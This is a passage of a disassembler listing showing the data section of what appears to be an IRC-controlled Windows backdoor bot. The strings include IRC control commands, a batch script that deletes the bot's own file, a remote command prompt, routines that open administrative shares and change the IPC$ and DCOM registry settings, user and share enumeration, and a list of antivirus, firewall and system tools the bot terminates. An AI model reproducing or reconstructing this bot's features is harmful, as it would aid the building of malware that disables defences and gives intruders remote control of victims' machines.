aNickS_1 db 'NICK %s',0Ah,0 ; DATA XREF: sub_417B76+B1�o
align 4
a432 db '432',0 ; DATA XREF: sub_417B76+79�o
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_417B76+61�o
align 4
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_417C61+9B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
a__1 db '-|`_\{[]}',0 ; DATA XREF: sub_417E84+BC�o
; sub_417E84+175�r ...
align 4
dword_439374 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_4182CD+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4393C0 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_4182CD+E3�o
dword_4393DC dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_4182CD+118�o
dword_4393F0 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4182CD+13F�o
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_418699+72�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4187E0+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_418884+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_4188A6+140�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_4188A6+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_4188A6+48�o
align 4
unk_4394A4 db 2Dh ; - ; DATA XREF: sub_418A2E+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
unk_4394D4 db 2Dh ; - ; DATA XREF: sub_418A2E+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
dword_4394FC dd 234032Dh, 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h
; DATA XREF: sub_418A2E+5C�o
dd 65726165h, 64h
off_439518 dd offset aAdd ; DATA XREF: sub_418C0E+60�r
; sub_418FE5+51�r ...
; "Add"
off_43951C dd offset aAdded ; DATA XREF: sub_418C0E+2D�r
; sub_418FE5+83�r ...
; "Added"
dword_439520 dd 0 ; DATA XREF: sub_418C0E+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 43958Ch, 439584h, 2, 439578h, 43956Ch, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused_0 db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0043954C�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:00439548�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00439540�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0043953C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:00439534�o
align 4
aList_1 db 'List',0 ; DATA XREF: .data:00439530�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:00439528�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:00439524�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_43951C�o
align 4
aAdd db 'Add',0 ; DATA XREF: .data:off_439518�o
unk_4395E0 db 2Dh ; - ; DATA XREF: sub_418C0E+67�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
unk_439604 db 2Dh ; - ; DATA XREF: sub_418C0E+51�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 10h
unk_439630 db 2Dh ; - ; DATA XREF: sub_418C0E+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_418D2A+12C�o
align 10h
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_418D2A:loc_418E42�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_418D2A:loc_418E3B�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_418D2A:loc_418E34�o
db 'the state of the service.',0
align 10h
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_418D2A:loc_418E2D�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_418D2A:loc_418E26�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_418D2A:loc_418E1F�o
align 10h
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_418D2A:loc_418E18�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_418D2A:loc_418E11�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_418D2A:loc_418E0A�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_418D2A:loc_418E03�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_418D2A:loc_418DD8�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_418D2A:loc_418DD1�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_418D2A:loc_418DCA�o
db 'tServiceCtrlDispatcher.',0
align 10h
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_418D2A:loc_418DC3�o
align 10h
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_418D2A+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_418D2A:loc_418D98�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_418D2A:loc_418D8E�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_418D2A:loc_418D84�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_418D2A:loc_418D7A�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_418D2A:loc_418D70�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_418D2A+3C�o
align 4
aSSS_2 db '%s: %s (%s)',0 ; DATA XREF: sub_418EA8+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_418EA8:loc_418F74�o
aStarting db ' Starting',0 ; DATA XREF: sub_418EA8:loc_418F6D�o
aStoping db ' Stoping',0 ; DATA XREF: sub_418EA8:loc_418F66�o
aRunning db ' Running',0 ; DATA XREF: sub_418EA8:loc_418F5F�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_418EA8:loc_418F58�o
aPausing db ' Pausing',0 ; DATA XREF: sub_418EA8:loc_418F51�o
aPaused db ' Paused',0 ; DATA XREF: sub_418EA8:loc_418F4A�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_418EA8+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_418EA8+25�o
align 4
unk_439B84 db 2Dh ; - ; DATA XREF: sub_418FE5+AC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
dword_439BA8 dd 234032Dh, 274656Eh, 25202D03h, 68732073h, 3A657261h
; DATA XREF: sub_418FE5+8A�o
dd 73252720h, 27h
unk_439BC4 db 2Dh ; - ; DATA XREF: sub_418FE5+58�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4191DB+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4191DB+BC�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4191DB+B5�o
unk_439C10 db 2Dh ; - ; DATA XREF: sub_4191DB+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4191DB+26�o
align 10h
unk_439C70 db 2Dh ; - ; DATA XREF: sub_4192FC+B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
unk_439C98 db 2Dh ; - ; DATA XREF: sub_4192FC+95�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
unk_439CC8 db 2Dh ; - ; DATA XREF: sub_4192FC+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
unk_439CE8 db 2Dh ; - ; DATA XREF: sub_419443+3AF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_419443+385�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_419443+35A�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_419443+32F�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_419443+304�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_419443+2D9�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_419443+2AE�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_419443+283�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_419443+258�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_419443+22D�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_419443+202�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_419443+1D7�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_419443+1AC�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_419443+181�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_419443+156�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_419443+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_419443:loc_419562�o
align 4
aUser_3 db 'User',0 ; DATA XREF: sub_419443:loc_41955B�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_419443:loc_419554�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_419443+DA�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_419443+AF�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_419443+84�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_419443+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41982C+14F�o
align 4
unk_439EA4 db 2Dh ; - ; DATA XREF: sub_41982C+F7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 10h
aS_4 db ' %S',0 ; DATA XREF: sub_41982C+BE�o
align 4
unk_439ED8 db 2Dh ; - ; DATA XREF: sub_41982C+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41982C+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4199AC:loc_419AC9�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4199AC:loc_419AC2�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4199AC:loc_419ABB�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4199AC:loc_419AB4�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_4199AC:loc_419AAD�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4199AC:loc_419A90�o
db 'ord policy requirement.)',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4199AC:loc_419A89�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4199AC:loc_419A82�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4199AC+CF�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4199AC:loc_419A57�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4199AC:loc_419A50�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4199AC:loc_419A49�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4199AC:loc_419A3F�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4199AC+89�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4199AC:loc_419A19�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4199AC:loc_419A0F�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4199AC:loc_419A05�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4199AC:loc_4199FB�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4199AC:loc_4199F1�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4199AC+3B�o
align 10h
dword_43A1E0 dd 234032Dh, 274656Eh, 25202D03h, 34032073h, 76726553h
; DATA XREF: sub_419AE0+AB�o
dd 3A037265h, 20532520h, 654D3403h, 67617373h, 203A0365h
dd 5325h
unk_43A20C db 2Dh ; - ; DATA XREF: sub_419AE0+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
dword_43A234 dd 7530h ; DATA XREF: sub_419F4D+12�r
off_43A238 dd offset aRegedit_exe ; DATA XREF: sub_419C09+CB�o
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe_0 ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: sub_419C09+EC�o
; .data:0043A294�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0043A290�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0043A28C�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0043A288�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0043A284�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0043A280�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0043A27C�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0043A278�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0043A274�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0043A270�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: .data:0043A26C�o
aMsblast_exe_0 db 'MSBLAST.exe',0 ; DATA XREF: .data:0043A268�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0043A264�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0043A260�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0043A25C�o
align 10h
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: .data:0043A258�o
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: .data:0043A254�o
align 4
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: .data:0043A250�o
align 4
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: .data:0043A24C�o
align 4
aZapro_exe db 'zapro.exe',0 ; DATA XREF: .data:0043A248�o
align 10h
aMsblast_exe db 'msblast.exe',0 ; DATA XREF: .data:0043A244�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:0043A240�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: .data:0043A23C�o
align 4
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .data:off_43A238�o
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_419C09+191�o
align 10h
unk_43A3F0 db 2Dh ; - ; DATA XREF: sub_419E38:loc_419EBF�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
unk_43A414 db 2Dh ; - ; DATA XREF: sub_419E38+80�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
unk_43A438 db 2Dh ; - ; DATA XREF: sub_419E38+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
aPrivmsgSS_1 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_419FD5+33�o
unk_43A468 db 2Dh ; - ; DATA XREF: sub_41A05C:loc_41A18E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0
unk_43A498 db 2Dh ; - ; DATA XREF: sub_41A05C+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 10h
unk_43A4C0 db 2Dh ; - ; DATA XREF: sub_41A05C:loc_41A142�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0
align 10h
unk_43A4F0 db 2Dh ; - ; DATA XREF: sub_41A1B1+194�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
unk_43A524 db 2Dh ; - ; DATA XREF: sub_41A1B1+14C�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 4
off_43A548 dd offset aIpc ; DATA XREF: sub_41A3C6+1B3�o
; sub_41A6EA+17A�o
; "IPC$"
align 10h
dd offset aAdmin_0 ; "ADMIN$"
align 8
off_43A558 dd offset dword_43A574 ; DATA XREF: sub_41A6EA+1E3�o
dd offset dword_43A570
dd offset dword_43A56C
dd offset dword_43A568
dword_43A568 dd 5C3A44h ; DATA XREF: sub_41A3C6+217�o
; .data:0043A564�o
dword_43A56C dd 2444h ; DATA XREF: .data:0043A560�o
dword_43A570 dd 5C3A43h ; DATA XREF: .data:0043A55C�o
dword_43A574 dd 2443h ; DATA XREF: .data:off_43A558�o
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:0043A550�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_43A548�o
align 4
dword_43A588 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+2E5�o
; sub_41A6EA+2DB�o
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_43A5B8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+2CF�o
aNetworkSharesD db '- Network shares deleted.',0
align 10h
dword_43A5E0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A628�o
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_43A60C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+25B�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 10h
dword_43A630 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A595�o
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_43A65C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+1C8�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 10h
dword_43A680 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A4F8�o
; sub_41A6EA:loc_41A818�o
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 10h
dword_43A6B0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A4F1�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
dword_43A6EC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A4D3�o
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 10h
dword_43A720 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+106�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41A3C6+ED�o
; sub_41A6EA+ED�o
align 10h
dword_43A770 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+91�o
; sub_41A6EA+91�o
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
dword_43A7A0 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 64204D4Fh
; DATA XREF: sub_41A3C6:loc_41A433�o
dd 62617369h, 2E64656Ch, 0
dword_43A7C0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+66�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41A3C6+54�o
; sub_41A6EA+54�o
align 10h
dword_43A7F0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+2C3�o
aNetworkSharesA db '- Network shares added.',0
aC_0 db '%c:\',0 ; DATA XREF: sub_41A6EA+230�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_41A6EA+219�o
dword_43A820 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA:loc_41A889�o
; sub_41A6EA:loc_41A95A�o
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
dword_43A848 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+198�o
; sub_41A6EA+269�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_43A868 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA:loc_41A811�o
aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0
dword_43A8A4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA:loc_41A7F3�o
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_43A8DC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+102�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
dword_43A91C dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 65204D4Fh
; DATA XREF: sub_41A6EA:loc_41A757�o
dd 6C62616Eh, 2E6465h
dword_43A938 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+66�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41AA1E+E1�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dword_43A990 dd 234032Dh, 65657073h, 73657464h, 2D030274h, 75450220h
; DATA XREF: sub_41ABFB+1A7�o
dd 65706F72h, 25203A02h, 626B2064h, 732F7469h, 53550220h
dd 203A0241h, 6B206425h, 2F746962h, 41022073h, 2616973h
dd 6425203Ah, 69626B20h, 20732F74h, 65764102h, 65676172h
dd 25203A02h, 626B2064h, 732F7469h, 0
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41ABFB+C4�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41ABFB+BD�o
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41ABFB+B6�o
align 10h
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41ABFB+AF�o
align 10h
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41ABFB+A8�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41ABFB+A1�o
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41ABFB+9A�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41ABFB+93�o
align 10h
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41ABFB+8C�o
align 10h
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41ABFB+85�o
align 10h
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41ABFB+7E�o
align 10h
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41ABFB+77�o
align 10h
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41ABFB+70�o
align 4
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41ABFB+69�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41ABFB+62�o
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41ABFB+5B�o
align 10h
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41ABFB+54�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41ABFB+4D�o
align 10h
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41ABFB+46�o
align 10h
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41ABFB+3F�o
align 10h
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41ABFB+38�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41ABFB+31�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41ABFB+2A�o
align 10h
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41ABFB+23�o
align 4
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41ABFB+1C�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41ABFB+15�o
dword_43AB9C dd 234032Dh, 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
; DATA XREF: sub_41AF8F+297�o
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41AF8F+192�o
